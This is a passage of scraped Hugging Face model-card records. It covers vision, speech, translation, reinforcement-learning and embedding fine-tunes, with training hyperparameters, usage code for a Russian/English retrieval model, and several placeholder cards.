"base_model:google/paligemma-3b-pt-224",
"base_model:adapter:google/paligemma-3b-pt-224",
"license:gemma",
"region:us"
] | null | 2025-06-06T12:36:56Z | ---
library_name: peft
license: gemma
base_model: google/paligemma-3b-pt-224
tags:
- generated_from_trainer
model-index:
- name: Abhishek-PaliGemma-FT
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Abhishek-PaliGemma-FT
This model is a fine-tuned version of [google/paligemma-3b-pt-224](https://huggingface.co/google/paligemma-3b-pt-224) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 2
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 2
- num_epochs: 2
### Training results
### Framework versions
- PEFT 0.15.2
- Transformers 4.53.0.dev0
- Pytorch 2.7.1+cu118
- Datasets 3.6.0
- Tokenizers 0.21.1 |
N-Bot-Int/ZoraBetaA1 | N-Bot-Int | 2025-06-09T13:11:13Z | 21 | 1 | peft | [
"peft",
"tensorboard",
"safetensors",
"trl",
"sft",
"unsloth",
"generated_from_trainer",
"en",
"base_model:HuggingFaceH4/zephyr-7b-beta",
"base_model:adapter:HuggingFaceH4/zephyr-7b-beta",
"license:apache-2.0",
"region:us"
] | null | 2025-06-08T04:33:32Z | ---
library_name: peft
license: apache-2.0
base_model:
- HuggingFaceH4/zephyr-7b-beta
tags:
- trl
- sft
- unsloth
- generated_from_trainer
model-index:
- name: ZoraBetaA1
results: []
language:
- en
---
Support us On **KO-FI**
[](https://ko-fi.com/J3J61D8NHV)

**ZoraBetaA family**
# ZoraBetaA1 - SuperCompanion
- ZoraBetaA1 is Our Brand new AI Model, finetuned using [Iris-Uncensored-Reformat-R2](https://huggingface.co/datasets/N-Bot-Int/Iris-Uncensored-Reformat-R2?not-for-all-audiences=true),
ZoraBetaA1 showcase a Strong reasoning Capability With a Stronger Finetuned Bias toward Roleplaying Using **Zephyr Beta 7B**,
ZoraBetaA1 also Shows a Great Companionship Capabilities, Without Hallucinating Much Unlike MistThena7B Finetuned Using Mistral 7b v0.1,
This New Architecture allow us To Increase Roleplaying capabilities without Doing everything from scratch as **Zephyr Beta** has a Strong RP foundation already,
Leading us to Scaffolding on this Architecture And Increasing Roleplaying capabilities further.
- ZoraBetaA1 contains Cleaned Dataset, however its still relatively Unstable so please Report any issues found through our email
[nexus.networkinteractives@gmail.com](nexus.networkinteractives@gmail.com)
about any overfitting, or improvements for the future Models
Once again feel free to Modify the LORA to your likings, However please consider Adding this Page
for credits and if you'll increase its **Dataset**, then please handle it with care and ethical considerations
- ZoraBetaA1 is
- **Developed by:** N-Bot-Int
- **License:** apache-2.0
- **Parent Model from model:** HuggingFaceH4/zephyr-7b-beta
- **Dataset Combined Using:** UltraDatasetCleanerAndMoshpit-R1(Propietary Software)
- # Notice
- **For a Good Experience, Please use**
- Low temperature 1.5, min_p = 0.1 and max_new_tokens = 128
- # Detail card:
- Parameter
- 3 Billion Parameters
- (Please visit your GPU Vendor if you can Run 3B models)
- Training
- 300 Steps from
Iris-Dataset-Reformat-R1
- Finetuning tool:
- Unsloth AI
- This Zephyr model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
- Fine-tuned Using:
- Google Colab |
Sargis001/w2v-bert-2.0-armenian001-CV16.0 | Sargis001 | 2025-06-09T13:11:02Z | 0 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"wav2vec2-bert",
"automatic-speech-recognition",
"generated_from_trainer",
"dataset:common_voice_16_0",
"base_model:facebook/w2v-bert-2.0",
"base_model:finetune:facebook/w2v-bert-2.0",
"license:mit",
"model-index",
"endpoints_compatible",
"region... | automatic-speech-recognition | 2025-06-09T11:54:37Z | ---
library_name: transformers
license: mit
base_model: facebook/w2v-bert-2.0
tags:
- generated_from_trainer
datasets:
- common_voice_16_0
metrics:
- wer
model-index:
- name: w2v-bert-2.0-armenian001-CV16.0
results:
- task:
name: Automatic Speech Recognition
type: automatic-speech-recognition
dataset:
name: common_voice_16_0
type: common_voice_16_0
config: hy-AM
split: test
args: hy-AM
metrics:
- name: Wer
type: wer
value: 0.18761654315084866
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# w2v-bert-2.0-armenian001-CV16.0
This model is a fine-tuned version of [facebook/w2v-bert-2.0](https://huggingface.co/facebook/w2v-bert-2.0) on the common_voice_16_0 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.1976
- Wer: 0.1876
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 16
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 32
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- num_epochs: 11
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:------:|:----:|:---------------:|:------:|
| 1.8263 | 1.5973 | 300 | 0.2693 | 0.3295 |
| 0.2076 | 3.192 | 600 | 0.2353 | 0.2617 |
| 0.13 | 4.7893 | 900 | 0.1974 | 0.2250 |
| 0.0778 | 6.384 | 1200 | 0.1845 | 0.1990 |
| 0.0479 | 7.9813 | 1500 | 0.2057 | 0.1905 |
| 0.0238 | 9.576 | 1800 | 0.1976 | 0.1876 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.7.1+cu126
- Datasets 2.15.0
- Tokenizers 0.21.1
|
jinx2321/byt5-1e4-paper-distilled-ko-8 | jinx2321 | 2025-06-09T13:08:29Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/byt5-1e4-paper-ko",
"base_model:finetune:jinx2321/byt5-1e4-paper-ko",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T12:28:38Z | ---
library_name: transformers
license: apache-2.0
base_model: jinx2321/byt5-1e4-paper-ko
tags:
- generated_from_trainer
model-index:
- name: byt5-1e4-paper-distilled-ko-8
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# byt5-1e4-paper-distilled-ko-8
This model is a fine-tuned version of [jinx2321/byt5-1e4-paper-ko](https://huggingface.co/jinx2321/byt5-1e4-paper-ko) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
jinx2321/byt5-1e4-paper-distilled-je-7 | jinx2321 | 2025-06-09T13:07:32Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/byt5-1e4-paper-je",
"base_model:finetune:jinx2321/byt5-1e4-paper-je",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T12:28:19Z | ---
library_name: transformers
license: apache-2.0
base_model: jinx2321/byt5-1e4-paper-je
tags:
- generated_from_trainer
model-index:
- name: byt5-1e4-paper-distilled-je-7
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# byt5-1e4-paper-distilled-je-7
This model is a fine-tuned version of [jinx2321/byt5-1e4-paper-je](https://huggingface.co/jinx2321/byt5-1e4-paper-je) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
dadsaasda/Phi_4_merged_lora_v1 | dadsaasda | 2025-06-09T13:04:13Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"base_model:unsloth/phi-4-unsloth-bnb-4bit",
"base_model:finetune:unsloth/phi-4-unsloth-bnb-4bit",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
... | text-generation | 2025-06-09T13:04:04Z | ---
base_model: unsloth/phi-4-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** dadsaasda
- **License:** apache-2.0
- **Finetuned from model :** unsloth/phi-4-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
hubwol/ppo-LunarLander-v2 | hubwol | 2025-06-09T13:01:13Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"LunarLander-v2",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T13:00:38Z | ---
library_name: stable-baselines3
tags:
- LunarLander-v2
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: PPO
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: LunarLander-v2
type: LunarLander-v2
metrics:
- type: mean_reward
value: 249.75 +/- 15.28
name: mean_reward
verified: false
---
# **PPO** Agent playing **LunarLander-v2**
This is a trained model of a **PPO** agent playing **LunarLander-v2**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
TODO: Add your code
```python
from stable_baselines3 import ...
from huggingface_sb3 import load_from_hub
...
```
|
ou474747/DeepSeek-R1-Distill-Qwen-1.5B-rl-sft-cot-lr5.0e-6_sched-cosine_with_min_lr_ep3_bs8_gs4_high_lr | ou474747 | 2025-06-09T12:54:57Z | 0 | 0 | peft | [
"peft",
"tensorboard",
"safetensors",
"arxiv:1910.09700",
"region:us"
] | null | 2025-06-09T12:54:34Z | ---
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
gradientrouting-spar/mc4_badmed_st_we_atc-0.45_pos_prx-proxy_neg_prx-proxy_neg_st_alpha-0.1_seed_1_epoch_1 | gradientrouting-spar | 2025-06-09T12:54:28Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T11:41:35Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Koleshjr/KE_clinician_cleaned_cosine_v50-unsloth_Qwen3-0.6B-Base-unsloth-bnb-4bit-1.0_16bit | Koleshjr | 2025-06-09T12:54:16Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"base_model:unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit",
"base_model:finetune:unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit",
"license:apache-2.0",
"autotrain_compatible",
"end... | text-generation | 2025-06-09T12:51:54Z | ---
base_model: unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** Koleshjr
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen3-0.6B-Base-unsloth-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
thejaminator/9jun-bad-security-8000security-4e-05-qwen3_32b-epochs1 | thejaminator | 2025-06-09T12:51:27Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"base_model:unsloth/Qwen3-32B",
"base_model:finetune:unsloth/Qwen3-32B",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T12:51:05Z | ---
base_model: unsloth/Qwen3-32B
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** thejaminator
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen3-32B
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
aferrante/MNLP_M3_mcqa_modelNew | aferrante | 2025-06-09T12:51:20Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"conversational",
"en",
"base_model:unsloth/Qwen3-0.6B-Base",
"base_model:finetune:unsloth/Qwen3-0.6B-Base",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatibl... | text-generation | 2025-06-09T12:25:19Z | ---
base_model: unsloth/Qwen3-0.6B-Base
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
- sft
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** aferrante
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen3-0.6B-Base
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
ai-sage/Giga-Retrieval-instruct | ai-sage | 2025-06-09T12:50:42Z | 153 | 4 | null | [
"safetensors",
"gigarembed",
"feature-extraction",
"custom_code",
"ru",
"en",
"license:mit",
"region:us"
] | feature-extraction | 2025-05-29T12:38:46Z | ---
license: mit
language:
- ru
- en
pipeline_tag: feature-extraction
---
## Giga-Retrieval-instruct
- Base Decoder-only LLM: Pruned GigaChat-3b
- Pooling Type: Latent-Attention
- Embedding Dimension: 2048
## Использование
Ниже приведен пример кодирования запросов и текстов.
### Requirements
```bash
pip install -q transformers==4.46.3 sentence-transformers==3.3.1 datasets langchain_community langchain_huggingface langchain_gigachat
```
### Transformers
```python
import os
import torch
import torch.nn.functional as F
from transformers import AutoTokenizer, AutoModel
# Each query needs to be accompanied by an corresponding instruction describing the task.
task_name_to_instruct = {"example": "Given a question, retrieve passages that answer the question",}
query_prefix = task_name_to_instruct["example"] + "\nquestion: "
queries = [
'are judo throws allowed in wrestling?',
'how to become a radiology technician in michigan?'
]
# No instruction needed for retrieval passages
passage_prefix = ""
passages = [
"Since you're reading this, you are probably someone from a judo background or someone who is just wondering how judo techniques can be applied under wrestling rules. So without further ado, let's get to the question. Are Judo throws allowed in wrestling? Yes, judo throws are allowed in freestyle and folkstyle wrestling. You only need to be careful to follow the slam rules when executing judo throws. In wrestling, a slam is lifting and returning an opponent to the mat with unnecessary force.",
"Below are the basic steps to becoming a radiologic technologist in Michigan:Earn a high school diploma. As with most careers in health care, a high school education is the first step to finding entry-level employment. Taking classes in math and science, such as anatomy, biology, chemistry, physiology, and physics, can help prepare students for their college studies and future careers.Earn an associate degree. Entry-level radiologic positions typically require at least an Associate of Applied Science. Before enrolling in one of these degree programs, students should make sure it has been properly accredited by the Joint Review Committee on Education in Radiologic Technology (JRCERT).Get licensed or certified in the state of Michigan."
]
# load model with tokenizer
model = AutoModel.from_pretrained('ai-sage/Giga-Retrieval-instruct', trust_remote_code=True)
# get the embeddings
query_embeddings = model.encode(queries, instruction=query_prefix)
passage_embeddings = model.encode(passages, instruction=passage_prefix)
scores = (query_embeddings @ passage_embeddings.T) * 100
print(scores.tolist())
```
### LangChain
```python
import torch
from langchain_huggingface import HuggingFaceEmbeddings
# Load model
embeddings = HuggingFaceEmbeddings(
model_name='ai-sage/Giga-Retrieval-instruct',
encode_kwargs={},
model_kwargs={
'device': 'cuda', # or 'cpu'
'trust_remote_code': True,
'model_kwargs': {'torch_dtype': torch.bfloat16},
'prompts': {'query': 'Given a question, retrieve passages that answer the question\nquestion: '}
}
)
# Tokenizer
embeddings._client.tokenizer.tokenize("Hello world! I am GigaChat")
# Query embeddings
query_embeddings = embeddings.embed_query("Hello world!")
print(f"Your embeddings: {query_embeddings[0:20]}...")
print(f"Vector size: {len(query_embeddings)}")
# Document embeddings
documents = ["foo bar", "bar foo"]
documents_embeddings = embeddings.embed_documents(documents)
print(f"Vector size: {len(documents_embeddings)} x {len(documents_embeddings[0])}")
```
## Инструктивность
**Использование инструкций для улучшения качества эмбеддингов**
Для достижения более точных результатов при работе с эмбеддингами, особенно в задачах поиска и извлечения информации (retrieval), рекомендуется добавлять инструкцию на естественном языке перед текстовым запросом (query). Это помогает модели лучше понять контекст и цель запроса, что положительно сказывается на качестве результатов. Важно отметить, что инструкцию нужно добавлять только перед запросом, а не перед документом.
Для **retrieval-задач** (например, поиск ответа в тексте) можно использовать инструкцию:
`'Дан вопрос, необходимо найти абзац текста с ответом \nвопрос: {query}'`.
Такой подход особенно эффективен для задач поиска и извлечения информации, таких как поиск релевантных документов или извлечение ответов из текста.
**Примеры инструкций для retrieval-задач:**
- `'Дан вопрос, необходимо найти абзац текста с ответом \nвопрос: {query}'`
- `'Given the question, find a paragraph with the answer \nquestion: {query}'`
Использование инструкций позволяет значительно улучшить качество поиска и релевантность результатов, что подтверждается тестами на бенчмарках, таких как RuBQ. Для симметричных задач добавление инструкции перед каждым запросом обеспечивает согласованность и повышает точность модели.
## Поддерживаемые языки
Эта модель инициализирована pretrain моделью GigaChat и дополнительно обучена на смеси английских и русских данных. Однако, поскольку pretrain GigaChat'a делался в основном на русскоязычных данных, мы рекомендуем использовать эту модель только для русского языка.
## FAQ
1. Нужно ли добавлять инструкции к запросу?
Да, именно так модель обучалась, иначе вы увидите снижение качества. Определение задачи должно быть инструкцией в одном предложении, которая описывает задачу. Это способ настройки текстовых эмбеддингов для разных сценариев с помощью инструкций на естественном языке.
С другой стороны, добавлять инструкции на сторону документа не требуется.
2. Почему мои воспроизведённые результаты немного отличаются от указанных в карточке модели?
Разные версии библиотек transformers и pytorch могут вызывать незначительные, но ненулевые различия в результатах.
## Ограничения
Использование этой модели для входных данных, содержащих более 4096 токенов, невозможно. |
mina5rovic/W4A16_margo | mina5rovic | 2025-06-09T12:42:53Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"compressed-tensors",
"region:us"
] | text-generation | 2025-06-09T12:42:23Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
